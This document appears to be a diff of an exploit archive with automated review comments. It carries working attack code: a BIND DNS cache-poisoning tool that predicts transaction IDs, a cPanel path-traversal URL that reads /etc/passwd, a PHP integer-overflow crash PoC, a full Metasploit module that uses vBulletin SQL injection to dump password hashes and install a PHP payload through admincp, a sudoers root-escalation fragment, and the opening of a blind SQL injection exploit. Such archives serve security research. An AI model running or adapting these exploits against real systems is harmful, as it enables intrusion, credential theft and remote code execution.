packet+="\x00\x01" # answers: class (IN)
packet+="\x00\x00\x00\x01" # answers: time to live (1sec)
packet+=pack(">H", len(self.name)+2) # answers: data length
packet+="\x01" + "x" + self.name # answers: primary name
else:
packet+="\x00\x01" # answers: type (A)
packet+="\x00\x01" # answers: class (IN)
packet+="\x00\x00\x00\x01" # answers: time to live (1sec)
packet+="\x00\x04" # answers: data length
packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.'))) # IP
#packet+="\x00\x00\x29\x10\x00\x00\x00\x00\x00\x00\x00" # Additional
return packet
class DNSServer:
def __init__(self):
self.is_r = []
self.is_w = []
self.is_e = []
self.targets = []
self.named_conf = []
for i in xrange(len(_NAMED_CONF)):
start = 0
tmp = ''
for j in xrange(len(_NAMED_CONF[i][0])):
if _NAMED_CONF[i][0][j] == '.':
tmp += chr(j - start)
tmp += _NAMED_CONF[i][0][start:j]
start = j + 1
tmp += chr(j - start + 1)
tmp += _NAMED_CONF[i][0][start:] + "\x00"
self.named_conf.append([tmp, _NAMED_CONF[i][1]])
return
def run(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.s.bind(('',53))
self.is_r.append(self.s)
next = False
i = 0
while 1:
r, w, e = select.select(self.is_r, self.is_w, self.is_e, 1.0)
if r:
try:
data, addr = self.s.recvfrom(1024)
except socket.error:
continue
txid = unpack(">H", data[0:2])[0]
p=DNSData(data)
if p.name == None:
continue
found = False
for j in xrange(len(self.named_conf)):
if p.name == self.named_conf[j][0]:
found = True
break
if found == True:
self.s.sendto(p.response(self.named_conf[j][1]), addr)
continue
# FIXME: wrong code, 'i' is 0 at begin and when 1 item in list...
for i in xrange(len(self.targets)):
if self.targets[i][0] == addr[0]:
break
if i == len(self.targets):
self.targets.append([addr[0], False, time.time(), [None, None], \
None, 0, 0, 0])
if self.targets[i][1] == False:
bsp = BINDSimplePredict(txid)
self.targets[i][1] = bsp.next
self.targets[i][3][0] = bsp.cand
bsp = BINDSimplePredict(txid, False)
self.targets[i][3][1] = bsp.cand
else:
if p.name == self.targets[i][4]:
elapsed = time.time() - self.targets[i][2]
if elapsed > _ANSWER_TIME_LIMIT:
print 'info: slow answer, discarding (%.2f sec)' % elapsed
else:
self.targets[i][5] += 1
found_v1 = False
found_v2 = False
for j in xrange(10):
if self.targets[i][3][0][j] == txid:
found_v1 = True
break
if self.targets[i][3][1][j] == txid:
found_v2 = True
break
if found_v1 == True or found_v2 == True:
self.targets[i][6] += 1
else:
self.targets[i][7] += 1
# TODO: if found_v1 or found_v2 is True, then show bind version!
print "\n" + str(i) + ' target:', self.targets
print '%f:%s:%d: id: %04x q: %d g: %d e: %d' % (time.time(), \
addr[0], addr[1], txid, self.targets[i][5], \
self.targets[i][6], self.targets[i][7])
self.targets[i][1] = False
self.targets[i][2] = time.time()
self.targets[i][4] = "\x01" + "x" + p.name
self.s.sendto(p.response(), addr)
return
def close(self):
self.s.close()
return
if __name__ == '__main__':
dns_srv = DNSServer()
try:
dns_srv.run()
except KeyboardInterrupt:
print 'ctrl-c, leaving...'
dns_srv.close()
# milw0rm.com [2007-08-07]
#!/usr/bin/env python
"""
DNS Cache Poison v0.3beta by posedge
based on the Amit Klein paper: http://www.trusteer.com/docs/bind9dns.html
output: <time>:<ip>:<port>: id: <id> q: <query> g: <good> e: <error>
id: ID to predict
q: number of queries from the DNS server (only queries with LSB at 0 in ID)
g: number of good predicted IDs
e: number of errors while trying to predict a *supposed to be* predicted ID
"""
import socket, select, sys, time
from struct import unpack, pack
from socket import htons
_ANSWER_TIME_LIMIT = 1.0 # 1sec
_NAMED_CONF = [[<your_dns1_hostname>, <your_dns1_ip>], \
[<your_dns2_hostname>, <your_dns2_ip>], \
[<etc>, <etc>]]
class BINDSimplePredict:
def __init__(self, txid, bind_9_2_3___9_4_1=True):
self.txid = txid
self.cand = []
if bind_9_2_3___9_4_1 == True:
# For BIND9 v9.2.3-9.4.1:
self.tap1=0x80000057
self.tap2=0x80000062
else:
# For BIND9 v9.0.0-9.2.2:
self.tap1=0xc000002b # (0x80000057>>1)|(1<<31)
self.tap2=0xc0000061 # (0x800000c2>>1)|(1<<31)
self.next = self.run()
return
def run(self):
if (self.txid & 1) != 0:
#print "info: LSB is not 0. Can't predict the next transaction ID."
return False
#print "info: LSB is 0, predicting..."
# One bit shift (assuming the two lsb's are 0 and 0)
for msb in xrange(0, 2):
self.cand.append(((msb<<15)|(self.txid>>1)) & 0xFFFF)
# Two bit shift (assuming the two lsb's are 1 and 1)
# First shift (we know the lsb is 1 in both LFSRs):
v=self.txid
v=(v>>1)^self.tap1^self.tap2
if (v & 1) == 0:
# After the first shift, the lsb becomes 0, so the two LFSRs now have
# identical lsb's: 0 and 0 or 1 and 1
# Second shift:
v1=(v>>1) # 0 and 0
v2=(v>>1)^self.tap1^self.tap2 # 1 and 1
else:
# After the first shift, the lsb becomes 1, so the two LFSRs now have
# different lsb's: 1 and 0 or 0 and 1
# Second shift:
v1=(v>>1)^self.tap1 # 1 and 0
v2=(v>>1)^self.tap2 # 0 and 1
# Also need to enumerate over the 2 msb's we are clueless about
for msbits in xrange(0, 4):
self.cand.append(((msbits<<14)|v1) & 0xFFFF)
self.cand.append(((msbits<<14)|v2) & 0xFFFF)
return True;
class DNSData:
def __init__(self, data):
self.data=data
self.name=''
for i in xrange(12, len(data)):
self.name+=data[i]
if data[i] == '\x00':
break
q_type = unpack(">H", data[i+1:i+3])[0]
if q_type != 1: # only type: A (host address) allowed.
self.name = None
return
def response(self, ip=None):
packet=''
packet+=self.data[0:2] # id
packet+="\x84\x10" # flags
packet+="\x00\x01" # questions
packet+="\x00\x01" # answer RRS
packet+="\x00\x00" # authority RRS
packet+="\x00\x00" # additional RRS
packet+=self.name # queries: name
packet+="\x00\x01" # queries: type (A)
packet+="\x00\x01" # queries: class (IN)
packet+="\xc0\x0c" # answers: name
if ip == None:
packet+="\x00\x05" # answers: type (CNAME)
packet+="\x00\x01" # answers: class (IN)
packet+="\x00\x00\x00\x01" # answers: time to live (1sec)
packet+=pack(">H", len(self.name)+2) # answers: data length
packet+="\x01" + "x" + self.name # answers: primary name
else:
packet+="\x00\x01" # answers: type (A)
packet+="\x00\x01" # answers: class (IN)
packet+="\x00\x00\x00\x01" # answers: time to live (1sec)
packet+="\x00\x04" # answers: data length
packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.'))) # IP
#packet+="\x00\x00\x29\x10\x00\x00\x00\x00\x00\x00\x00" # Additional
return packet
class DNSServer:
def __init__(self):
self.is_r = []
self.is_w = []
self.is_e = []
self.targets = []
self.named_conf = []
for i in xrange(len(_NAMED_CONF)):
start = 0
tmp = ''
for j in xrange(len(_NAMED_CONF[i][0])):
if _NAMED_CONF[i][0][j] == '.':
tmp += chr(j - start)
tmp += _NAMED_CONF[i][0][start:j]
start = j + 1
tmp += chr(j - start + 1)
tmp += _NAMED_CONF[i][0][start:] + "\x00"
self.named_conf.append([tmp, _NAMED_CONF[i][1]])
return
def run(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.s.bind(('',53))
self.is_r.append(self.s)
next = False
i = 0
while 1:
r, w, e = select.select(self.is_r, self.is_w, self.is_e, 1.0)
if r:
try:
data, addr = self.s.recvfrom(1024)
except socket.error:
continue
txid = unpack(">H", data[0:2])[0]
p=DNSData(data)
if p.name == None:
continue
found = False
for j in xrange(len(self.named_conf)):
if p.name == self.named_conf[j][0]:
found = True
break
if found == True:
self.s.sendto(p.response(self.named_conf[j][1]), addr)
continue
# FIXME: wrong code, 'i' is 0 at begin and when 1 item in list...
for i in xrange(len(self.targets)):
if self.targets[i][0] == addr[0]:
break
if i == len(self.targets):
self.targets.append([addr[0], False, time.time(), [None, None], \
None, 0, 0, 0])
if self.targets[i][1] == False:
bsp = BINDSimplePredict(txid)
self.targets[i][1] = bsp.next
self.targets[i][3][0] = bsp.cand
bsp = BINDSimplePredict(txid, False)
self.targets[i][3][1] = bsp.cand
else:
if p.name == self.targets[i][4]:
elapsed = time.time() - self.targets[i][2]
if elapsed > _ANSWER_TIME_LIMIT:
print 'info: slow answer, discarding (%.2f sec)' % elapsed
else:
self.targets[i][5] += 1
found_v1 = False
found_v2 = False
for j in xrange(10):
if self.targets[i][3][0][j] == txid:
found_v1 = True
break
if self.targets[i][3][1][j] == txid:
found_v2 = True
break
if found_v1 == True or found_v2 == True:
self.targets[i][6] += 1
else:
self.targets[i][7] += 1
# TODO: if found_v1 or found_v2 is True, then show bind version!
print "\n" + str(i) + ' target:', self.targets
print '%f:%s:%d: id: %04x q: %d g: %d e: %d' % (time.time(), \
addr[0], addr[1], txid, self.targets[i][5], \
self.targets[i][6], self.targets[i][7])
self.targets[i][1] = False
self.targets[i][2] = time.time()
self.targets[i][4] = "\x01" + "x" + p.name
self.s.sendto(p.response(), addr)
return
def close(self):
self.s.close()
return
if __name__ == '__main__':
dns_srv = DNSServer()
try:
dns_srv.run()
except KeyboardInterrupt:
print 'ctrl-c, leaving...'
dns_srv.close()
# milw0rm.com [2007-08-07]
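Review bot: the removed and added halves of this hunk are identical line for line, so this whole-file rewrite is a line-ending or trailing-whitespace change rather than a content change, and it should be labelled as such and ideally kept in a separate commit so that real edits to archived exploits stay reviewable. The archived code is carried over verbatim, including the `# FIXME: wrong code, 'i' is 0 at begin and when 1 item in list...` comment in `DNSServer.run`, the unused `from socket import htons` and the unused `next = False`; for an archive that is expected, but a one-line note that preservation is intentional would stop future contributors from "fixing" it.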

@ -1,46 +1,46 @@
+===================================================================================+
./SEC-R1Z _ __ _ _ _ _ ___ _ _ _ _ __ _ _ _ _ _
/ /_ _ _ _ / _ _\/ _ _ /\ \< |/_ _ _ _ /
\ \_ _ _ _/ /___ / / __ | |) / | | / /
\_ _ _ _/ /___ / / | __ || / | | / /
_______\ \_ _ \ \2_0_0_9 | \ | | / /____
/_ _ _ _ _\ _ _ _/\ _ _ _ / |__|\ __\ |__|/_ _ _ _ _\ R.I.P MichaelJackson !!!!!
+===================================================================================+
| |
| |
| CPANEL USER BYPASS |
| |
+===================================================================================+
| |
| Author.: Black Dream |
| Contact: Be5_at_HoTMail_dot_Fr |
| HoMe : www.sec-r1z.com |
| ARAB ETHICAL HACKING, PENETRATION TESTING & WEB APPLICATION SECURITY SYSTEM |
+===================================================================================+
| |
| Script.: CPANEL |
| Home...: http://CPANEL.NET |
| |
+-----------------------------------------------------------------------------------+
| |
| [+] Exploit: |
| |
| http://r1z.com:2082/frontend/x3/stats/lastvisit.html?domain=../../../../../../../../ etc/ passwd
| |
| |
| |
| |
| |
| [+] Now you see all cpanel[s] user[s] |
| |
| [+] Enjoy xD |
+-----------------------------------------------------------------------------------|
+===================================================================================+
| |
| Greetz.: ~ His0k4 ~ j0rd4n14n.r1z ~ SimO-s0fT ~ S4s-T3rr0rist ~ Golden-Z3r0 |
| Linux-D3v1L And All #sec-r1z memb3rz!!!! |
+===================================================================================+
E0D|F
# milw0rm.com [2009-06-29]
+===================================================================================+
./SEC-R1Z _ __ _ _ _ _ ___ _ _ _ _ __ _ _ _ _ _
/ /_ _ _ _ / _ _\/ _ _ /\ \< |/_ _ _ _ /
\ \_ _ _ _/ /___ / / __ | |) / | | / /
\_ _ _ _/ /___ / / | __ || / | | / /
_______\ \_ _ \ \2_0_0_9 | \ | | / /____
/_ _ _ _ _\ _ _ _/\ _ _ _ / |__|\ __\ |__|/_ _ _ _ _\ R.I.P MichaelJackson !!!!!
+===================================================================================+
| |
| |
| CPANEL USER BYPASS |
| |
+===================================================================================+
| |
| Author.: Black Dream |
| Contact: Be5_at_HoTMail_dot_Fr |
| HoMe : www.sec-r1z.com |
| ARAB ETHICAL HACKING, PENETRATION TESTING & WEB APPLICATION SECURITY SYSTEM |
+===================================================================================+
| |
| Script.: CPANEL |
| Home...: http://CPANEL.NET |
| |
+-----------------------------------------------------------------------------------+
| |
| [+] Exploit: |
| |
| http://r1z.com:2082/frontend/x3/stats/lastvisit.html?domain=../../../../../../../../ etc/ passwd
| |
| |
| |
| |
| |
| [+] Now you see all cpanel[s] user[s] |
| |
| [+] Enjoy xD |
+-----------------------------------------------------------------------------------|
+===================================================================================+
| |
| Greetz.: ~ His0k4 ~ j0rd4n14n.r1z ~ SimO-s0fT ~ S4s-T3rr0rist ~ Golden-Z3r0 |
| Linux-D3v1L And All #sec-r1z memb3rz!!!! |
+===================================================================================+
E0D|F
# milw0rm.com [2009-06-29]
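Review bot: as with the preceding file, the two halves of this hunk are identical, so this is a whitespace or line-ending rewrite with no content change. On the entry itself, the header gives only `Script.: CPANEL` and a 2009 date with no affected or fixed version, so the path traversal via the `domain` parameter of `frontend/x3/stats/lastvisit.html` cannot be matched against a specific cPanel release when triaging; an affected-version line and a reference would make the record usable.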

@ -63,6 +63,6 @@ sleep(1);
print("[*] /etc/sudoers has been modified.\n");
print("[*] attempting to \"sudo sh\". (use YOUR password)\n");
system("sudo sh");
exit(0);
# milw0rm.com [2005-08-30]
exit(0);
# milw0rm.com [2005-08-30]
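Review bot: the hunk re-emits `exit(0);` and the `# milw0rm.com [2005-08-30]` footer unchanged, so this is a line-ending or end-of-file newline fix on the last two lines rather than a code change; the same pattern appears in the next two hunks. Such normalisation is better committed on its own so the archive's history stays meaningful.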

@ -128,6 +128,6 @@ void printe(char *err,signed char e){
printf("[!] %s\n",err);
if(e)exit(e);
return;
}
// milw0rm.com [2005-08-30]
}
// milw0rm.com [2005-08-30]

@ -60,6 +60,6 @@ print "\n";
system "id";
exit();
# milw0rm.com [2005-02-07]
exit();
# milw0rm.com [2005-02-07]

14
platforms/php/remote/30117.php Executable file
@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/24261/info
PHP is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun. Attackers may exploit this issue to cause a buffer overflow and to corrupt process memory.
Attackers may be able to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will likely result in a denial-of-service condition.
This issue affects versions prior to PHP 5.2.3.
<?
$a=str_repeat("A", 65535);
$b=1;
$c=str_repeat("A", 65535);
chunk_split($a,$b,$c);
?>
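Review bot: the advisory text at the top of this new `.php` file sits outside any comment block and the code uses the `<?` short open tag, so as a PHP file the four prose lines would be emitted as output before the script runs, and the script body only parses when `short_open_tag` is enabled. Wrapping the header in `/* ... */` and using `<?php` would make the file self-describing and parseable everywhere. The text states only that versions prior to PHP 5.2.3 are affected; saying explicitly that 5.2.3 is the fixed release would make triage unambiguous.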

9
platforms/php/remote/30130.txt Executable file
@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24268/info
PHP is prone to an HTTP-response-header-injection vulnerability because it fails to sanitize user-supplied input.
An attacker can exploit this issue to inject additional cookie attributes into session cookies. This may lead to other attacks.
This issue affects PHP 5.2.3 (and prior versions) and PHP 4.4.7 (and prior versions).
http://www.example.com/session.php/PHPSESSID=ID;INJECTED=ATTRIBUTE;/
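Review bot: the affected-versions line lists only upper bounds, "PHP 5.2.3 (and prior versions)" and "PHP 4.4.7 (and prior versions)", with no fixed release, so a reader cannot tell from this entry which version closes the issue; add the fixed versions, or a statement that none was available at the time, next to the BID link.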

458
platforms/php/remote/30212.rb Executable file
@ -0,0 +1,458 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection',
'Description' => %q{
This module exploits a SQL injection vulnerability found in vBulletin 5 that has
been used in the wild since March 2013. This module uses the sqli to extract the
web application's usernames and hashes. With the retrieved information tries to
log into the admin control panel in order to deploy the PHP payload. This module
has been tested successfully on VBulletin Version 5.0.0 Beta 13 over an Ubuntu
Linux distribution.
},
'Author' =>
[
'Orestis Kourides', # Vulnerability discovery and PoC
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-3522' ],
[ 'OSVDB', '92031' ],
[ 'EDB', '24882' ],
[ 'BID', '58754' ],
[ 'URL', 'http://www.zempirians.com/archive/legion/vbulletin_5.pl.txt' ]
],
'Privileged' => false, # web server context
'Payload' =>
{
'DisableNops' => true,
'Space' => 10000 # Just value big enough to fit any php payload
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [[ 'vBulletin 5.0.0 Beta 11-28', { }]],
'DisclosureDate' => 'Mar 25 2013',
'DefaultTarget' => 0))
register_options(
[
OptString.new("TARGETURI", [true, 'The path to vBulletin', '/']),
OptInt.new("NODE", [false, 'Valid Node ID']),
OptInt.new("MINNODE", [true, 'Valid Node ID', 1]),
OptInt.new("MAXNODE", [true, 'Valid Node ID', 100])
], self.class)
end
def exists_node?(id)
mark = rand_text_alpha(8 + rand(5))
result = do_sqli(id, "select '#{mark}'")
if result and result =~ /#{mark}/
return true
end
return false
end
def brute_force_node
min = datastore["MINNODE"]
max = datastore["MAXNODE"]
if min > max
print_error("#{peer} - MINNODE can't be major than MAXNODE")
return nil
end
for node_id in min..max
if exists_node?(node_id)
return node_id
end
end
return nil
end
def get_node
if datastore['NODE'].nil? or datastore['NODE'] <= 0
print_status("#{peer} - Brute forcing to find a valid node id...")
return brute_force_node
end
print_status("#{peer} - Checking node id #{datastore['NODE']}...")
if exists_node?(datastore['NODE'])
return datastore['NODE']
else
return nil
end
end
def do_sqli(node, query)
mark = Rex::Text.rand_text_alpha(5 + rand(3))
random_and = Rex::Text.rand_text_numeric(4)
injection = ") and(select 1 from(select count(*),concat((select (select concat('#{mark}',cast((#{query}) as char),'#{mark}')) "
injection << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) "
injection << "AND (#{random_and}=#{random_and}"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "index.php", "ajax", "api", "reputation", "vote"),
'vars_post' =>
{
'nodeid' => "#{node}#{injection}",
}
})
unless res and res.code == 200 and res.body.to_s =~ /Database error in vBulletin/
return nil
end
data = ""
if res.body.to_s =~ /#{mark}(.*)#{mark}/
data = $1
end
return data
end
def get_user_data(node_id, user_id)
user = do_sqli(node_id, "select username from user limit #{user_id},#{user_id+1}")
pass = do_sqli(node_id, "select password from user limit #{user_id},#{user_id+1}")
salt = do_sqli(node_id, "select salt from user limit #{user_id},#{user_id+1}")
return [user, pass, salt]
end
def do_login(user, hash)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "login.php"),
'method' => 'POST',
'encode_params' => false,
'vars_get' => {
'do' => 'login'
},
'vars_post' => {
'url' => '%2Fadmincp%2F',
'securitytoken' => 'guest',
'logintype' => 'cplogin',
'do' => 'login',
'vb_login_md5password' => hash,
'vb_login_md5password_utf' => hash,
'vb_login_username' => user,
'vb_login_password' => '',
'cssprefs' => ''
}
})
if res and res.code == 200 and res.body and res.body.to_s =~ /window\.location.*admincp/ and res.headers['Set-Cookie']
session = res.get_cookies
else
return nil
end
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "admincp", "/"),
'cookie' => session
})
if res and res.code == 200 and res.body and res.body.to_s =~ /<title>Forums Admin Control Panel<\/title>/
return session
else
return nil
end
end
def get_token(response)
token_info = {
:session_hash => "",
:security_token => "",
:admin_hash => ""
}
if response =~ /var SESSIONHASH = "([0-9a-f]+)";/
token_info[:session_hash] = $1
end
if response =~ /var ADMINHASH = "([0-9a-f]+)";/
token_info[:admin_hash] = $1
end
if response =~ /var SECURITYTOKEN = "([0-9a-f\-]+)";/
token_info[:security_token] = $1
end
return token_info
end
def get_install_token
res = send_request_cgi({
"uri" => normalize_uri(target_uri.path, "admincp", "product.php"),
"vars_get" => {
"do" => "productadd"
},
"cookie" => @session
})
unless res and res.code == 200 and res.body.to_s =~ /SECURITYTOKEN/
return nil
end
return get_token(res.body.to_s)
end
def install_product(token_info)
xml_product = <<-EOF
<?xml version="1.0" encoding="ISO-8859-1"?>
<product productid="#{@product_id}" active="0">
<title>#{@product_id}</title>
<description>#{@product_id}</description>
<version>1.0</version>
<url>http://#{@product_id}.loc</url>
<versioncheckurl>http://#{@product_id}.loc/version.xml</versioncheckurl>
<dependencies>
<dependency dependencytype="vbulletin" minversion="" maxversion="" />
</dependencies>
<codes>
<code version="*">
<installcode>
<![CDATA[
#{payload.encoded}
]]>
</installcode>
<uninstallcode />
</code>
</codes>
<templates>
</templates>
<stylevardfns>
</stylevardfns>
<stylevars>
</stylevars>
<hooks>
</hooks>
<phrases>
</phrases>
<options>
</options>
<helptopics>
</helptopics>
<cronentries>
</cronentries>
<faqentries>
</faqentries>
<widgets>
</widgets>
</product>
EOF
post_data = Rex::MIME::Message.new
post_data.add_part(token_info[:session_hash], nil, nil, "form-data; name=\"s\"")
post_data.add_part("productimport", nil, nil, "form-data; name=\"do\"")
post_data.add_part(token_info[:admin_hash], nil, nil, "form-data; name=\"adminhash\"")
post_data.add_part(token_info[:security_token], nil, nil, "form-data; name=\"securitytoken\"")
post_data.add_part(xml_product, "text/xml", nil, "form-data; name=\"productfile\"; filename=\"product_juan2.xml\"")
post_data.add_part("", nil, nil, "form-data; name=\"serverfile\"")
post_data.add_part("1", nil, nil, "form-data; name=\"allowoverwrite\"")
post_data.add_part("999999999", nil, nil, "form-data; name=\"MAX_FILE_SIZE\"")
# Work around an incompatible MIME implementation
data = post_data.to_s
data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "admincp", "product.php"),
'method' => "POST",
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'cookie' => @session,
'vars_get' => {
"do" => "productimport"
},
'data' => data
})
if res and res.code == 200 and res.body and res.body.to_s =~ /Product #{@product_id} Imported/
return true
elsif res
fail_with(Failure::Unknown, "#{peer} - Error when trying to install the product.")
else
return false
end
end
def get_delete_token
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "admincp", "product.php"),
'cookie' => @session,
'vars_get' => {
"do" => "productdelete",
"productid" => @product_id,
"s" => @session_hash
}
})
if res and res.code == 200 and res.body.to_s =~ /SECURITYTOKEN/
return get_token(res.body.to_s)
end
return nil
end
def delete_product(token_info)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "admincp", "product.php"),
'method' => "POST",
'cookie' => @session,
'vars_get' => {
"do" => "productkill"
},
'vars_post' => {
"s" => token_info[:session_hash],
"do" => "productkill",
"adminhash" => token_info[:admin_hash],
"securitytoken" => token_info[:security_token],
"productid" => @product_id
}
})
if res and res.code == 200 and res.body.to_s =~ /Product #{@product_id} Uninstalled/
return true
end
return false
end
def check
node_id = get_node
unless node_id.nil?
return Msf::Exploit::CheckCode::Vulnerable
end
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "index.php")
})
if res and res.code == 200 and res.body.to_s =~ /"simpleversion": "v=5/
return Msf::Exploit::CheckCode::Detected
end
return Msf::Exploit::CheckCode::Unknown
end
def on_new_session(session)
print_status("#{peer} - Getting the uninstall token info...")
delete_token = get_delete_token
if delete_token.nil?
print_error("#{peer} - Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...")
return
end
print_status("#{peer} - Deleting the product #{@product_id}...")
if delete_product(delete_token)
print_good("#{peer} - Product #{@product_id} deleted")
else
print_error("#{peer} - Failed uninstall the product #{@product_id}, should be done manually...")
end
end
def exploit
print_status("#{peer} - Checking for a valid node id...")
node_id = get_node
if node_id.nil?
print_error("#{peer} - node id not found")
return
end
print_good("#{peer} - Using node id #{node_id} to exploit sqli... Counting users...")
data = do_sqli(node_id, "select count(*) from user")
if data.empty?
print_error("#{peer} - Error exploiting sqli")
return
end
count_users = data.to_i
users = []
print_good("#{peer} - #{count_users} users found")
for i in 0..count_users - 1
user = get_user_data(node_id, i)
report_auth_info({
:host => rhost,
:port => rport,
:user => user[0],
:pass => user[1],
:type => "hash",
:sname => (ssl ? "https" : "http"),
:proof => "salt: #{user[2]}" # Using proof to store the hash salt
})
users << user
end
@session = nil
users.each do |user|
print_status("#{peer} - Trying to log into vBulletin admin control panel as #{user[0]}...")
@session = do_login(user[0], user[1])
unless @session.blank?
print_good("#{peer} - Logged in successfully as #{user[0]}")
break
end
end
if @session.blank?
fail_with(Failure::NoAccess, "#{peer} - Failed to log into the vBulletin admin control panel")
end
print_status("#{peer} - Getting the install product security token...")
install_token = get_install_token
if install_token.nil?
fail_with(Failure::Unknown, "#{peer} - Failed to get the install token")
end
@session_hash = install_token[:session_hash]
@product_id = rand_text_alpha_lower(5 + rand(8))
print_status("#{peer} - Installing the malicious product #{@product_id}...")
if install_product(install_token)
print_good("#{peer} - Product successfully installed... payload should be executed...")
else
# Two situations trigger this path:
# 1) Upload failed but there wasn't answer from the server. I don't think it's going to happen often.
# 2) New session, for exemple when using php/meterpreter/reverse_tcp, the common situation.
# Because of that fail_with isn't used here.
return
end
print_status("#{peer} - Getting the uninstall token info...")
delete_token = get_delete_token
if delete_token.nil?
print_error("#{peer} - Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...")
return
end
print_status("#{peer} - Deleting the product #{@product_id}...")
if delete_product(delete_token)
print_good("#{peer} - Product #{@product_id} deleted")
else
print_error("#{peer} - Failed uninstall the product #{@product_id}, should be done manually...")
end
end
end
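Review bot: `check` is not a passive check: it calls `get_node`, which reaches `exists_node?` and `do_sqli`, so running it performs the injection against `index.php/ajax/api/reputation/vote` and, with `NODE` unset, brute-forces node ids from `MINNODE` to `MAXNODE`, each probe being a POST that must come back as a `Database error in vBulletin` page to count as a hit. The description should say so, or the version fingerprint (`"simpleversion": "v=5`) should be tried before any injection; from the defensive side it means every use of `check` leaves a run of database-error entries in the application log, which is the signal to alert on. Smaller points: the uninstall sequence in `on_new_session` and at the end of `exploit` is duplicated verbatim and belongs in one helper; `:proof => "salt: ..."` stores data in a field meant for evidence, as the comment admits; and the messages `MINNODE can't be major than MAXNODE` (should be "greater") and `for exemple` have typos.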

@ -1,4 +1,3 @@
#############################################################
# mypage0.4 LFI Vulnerability

@ -21,7 +21,7 @@
<tr>
<td>
<textarea name="execcommand" cols="60" rows="3">
</textarea>
&lt;/textarea&gt;
</td>
</tr>
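Review bot: the replacement line `&lt;/textarea&gt;` is the entity-encoded form of the closing tag, not a tag, so after this change the `<textarea name="execcommand" ...>` opened two lines above is never closed and the `</td>` and `</tr>` context that follows becomes textarea content. If the intent is to store the archived file with its markup escaped, the whole file should be escaped consistently; if the file is meant to remain a working HTML form, the literal `</textarea>` has to stay.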

@ -1,4 +1,3 @@
______ _ _ _
| ___ \ | | | | (_)
| |_/ /_____ _____ | |_ _| |_ _ ___ _ __

@ -1,241 +1,241 @@
<?php
# ---UNB153pl3_xpl.php 11.35 12/11/2005 #
# #
# Unclassified NewsBoard 1.5.3 patch level 3 "Datefrom" blind SQL #
# injection / Admin MD5 password hash dump #
# by rgod #
# site: http://rgod.altervista.org #
# #
# usage: launch from Apache, fill in requested fields, then go! #
# #
# make these changes in php.ini if you have troubles #
# with this script: #
# allow_call_time_pass_reference = on #
# register_globals = on #
# #
# Sun-tzu:"If he is taking his ease, give him no rest. If his forces are #
# united, separate them." #
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
echo'<html><head><title> Unclassified NewsBoard 1.5.3pl3 blind SQL injection
</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css"> body {background-color:#111111; SCROLLBAR-ARROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important} option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111; body * {font-size: 8pt !important} h1 {font-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
Unclassified NewsBoard 1.5.3pl3 blind SQL injection </p><p class="Stile6">a
script by rgod at <a href="http://rgod.altervista.org"target="_blank">
http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%"> <form
name="form1" method="post" action="'.$SERVER[PHP_SELF].'?path=value&host=
value&port=value&proxy=value"> <p> <input type="text" name="host"> <span
class="Stile5"> * hostname (ex: www.sitename.com) </span> </p> <p> <input
type="text" name="path"> <span class="Stile5"> * path ( ex: /unb/ or just / )
</span></p><p> <input type="text" name="fullpath"><span class="Stile5"> * full
path to site, need this for "INTO OUTFILE" statement (ex.: C:\\\www\\\site\\\)
</span></p><p> <input type="text" name="table_prefix"> <span class="Stile5">
specify a table prefix other than the default (unb1_)</span> </p><p><input
type="text" name="port"> <span class="Stile5">specify a port other than 80
( default value ) </span> </p> <p> <input type="text" name="proxy"> <span
class="Stile5"> send exploit through an HTTP proxy (ip:port) </span></p><p>
<input type="submit"name="Submit" value="go!"> </p> </form> </td> </tr> </table>
</body></html>';
function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
